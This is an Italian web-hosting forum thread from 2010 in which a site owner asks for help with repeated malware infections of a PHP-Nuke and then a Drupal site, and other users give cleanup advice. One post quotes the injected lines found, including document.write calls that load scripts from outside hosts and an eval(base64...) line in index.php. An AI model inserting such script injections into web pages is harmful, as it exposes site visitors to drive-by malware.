Problema Virus e Malware

Printable View

06-09-2010, 09.53.39

Problema Virus e Malware

Sul mio sito di continuo, nonostante riaplodo file non infetti, cambio pwd e controllo il sito stesso, di continuo trovo codice inserito alla prima riga del tipo eval(base64_encode(...... segue. Il sito non è navigabile e gli antivirus rilevano malware HTML:Script-inf !!!

Le continue richieste di supporto non servono a nulla.
Forse è un malware che attacca i siti php-nuke?
Sul mio pc con Avanst antivirus (un buon antivurus a mio parere), non viene rilevata la presenza di malware, solo se apro il sito su altervista allora mi dà un alert!

Come rimediare? C' è una soluzione o devo chiudere l'account e trovar un'altro hosting migliore di altervista? Oppure anche agli altri succede di essere attaccati da malwaree virus informatici?

Grazie
07-09-2010, 09.03.26
dementialsite

Provo a darti qualche dritta per iniziare (attualmente il tuo sito non risulta navigabile, ma per un errore 500 al server, non per malware).

A quanto dici, stai usando un CMS, la sequenza tipica delle attività da fare è questa:
- esegui un backup di tutto il sito, database compreso
- elimina tutti i contenuti dal tuo sito, ed installa il CMS "vergine" nella sua ultima versione
- soltanto dopo che hai verificato che i contenuti del database non siano infetti (se così non fosse, cerca di ripurlirli... ti consiglio di fare questa procedura prima su un tuo server locale, meglio se isolato dalla rete), ripristina i contenuti del database

Altre cose che puoi controllare: verifica se stai utilizzando qualche servizio esterno classificato come malevolo. Alcuni, insieme a possibili valide alternative, sono stati segnalati qui: http://forum.it.altervista.org/basi-...i-cattivi.html

Ottimo il fatto che hai pensato a fare una scansione anti-virus. Anche se non ti ha trovato nulla, ti consiglio di cambiare la password del tuo account...

Stammi bene...
07-09-2010, 13.48.58

Attacco Malware e worm

Ho istallato ieri un nuovo sito con l'opzione offerta di altervista istalla Drupal. Precedentemente c'era un php-Nuke ed era sempre infettto, allra ho cambiato.

Ebbene oggi è infetto! Trovo stringhe nei file .js del tipo:

document.write('<script src=http://coco88.hosting.paran.com/susu/8.php ><\/script>');
document.write('<script src=http://jungmannova.cz/images/clause34.php ><\/script>');

!!!!!!!!! oppure:

document.write('<script src=http://spinalhealthcare.org/_private/duringsurgery2.php ><\/script>');

e nei file index.php trovoalla prima riga eval (base64_encode(...............

Vi sembra possibile? Come avere una soluzione oppure bisogna chiudere tutti gli account?
07-09-2010, 14.03.32
Gianluca

Vedi qui: http://forum.it.altervista.org/probl...tml#post721401

In particolare leggi i documenti che trovi nei due link, dove ci sono indicazioni dettagliate su come avviene l'infezione